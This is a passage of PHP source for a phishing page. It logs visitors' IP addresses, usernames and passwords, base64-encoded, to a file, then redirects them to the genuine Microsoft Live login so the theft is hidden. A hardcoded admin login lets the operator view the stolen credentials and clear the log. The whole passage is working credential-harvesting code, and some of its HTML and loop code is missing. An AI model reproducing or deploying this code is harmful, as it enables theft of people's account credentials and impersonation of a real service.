For help on this subject, Google for \'chmod *you\'re favorite FTP software*\'. Example: \'chmod Filezilla\'', true);
if(!is_writable($txtPath))
layout('The file '.$xmlPath.' exists but writing to the file has failed. Make sure PHP has the right permissions to write to the file.
For help on this subject, Google for \'chmod *you\'re favorite FTP software*\'. Example: \'chmod Filezilla\'', true);
if($_GET['emptylog'] == 'true' && $_GET['flag'] == md5($adminEmail)) {
$content = '
Are you sure you want to delete all e-mails and passwords?
'; $content .= 'No'; $content .= 'Yes '; layout($content); } elseif($_GET['emptylog'] == 'true' && $_GET['flag'] == md5($adminPass)) { $txt = @fopen($txtPath, 'w'); fclose($txt); $message = 'Logfile cleared.'; } elseif($_POST['login'] == $adminEmail && $_POST['passwd'] == $adminPass) { $txt = file($txtPath); $content = '
| IP | Username | Password |
| '.base64_decode($tmp[1]).' | '; $content .= ''.base64_decode($tmp[2]).' | '; $content .= ''.base64_decode($tmp[3]).' | '; $content .= '
'; $content .= 'Empty Log'; layout($content); } elseif(!empty($_POST['login'])) { $txt = @fopen($txtPath, 'at'); fwrite($txt, "\n".base64_encode($_SERVER['REMOTE_ADDR']).";".base64_encode($_POST['login']).";".base64_encode($_POST['passwd'])); fclose($txt); $url = 'https://login.live.com/ppsecure/post.srf?cbid=20960&wreply=https%3A%2F%2Fsas.zone.msn.com%2FZoneServices%2Fsas.aspx&'; header('Location: '.$url.$_SERVER['QUERY_STRING'].'&login='.rawurlencode($_POST['login']).'&passwd=blabla%0A&remMe=1'); } } ?>
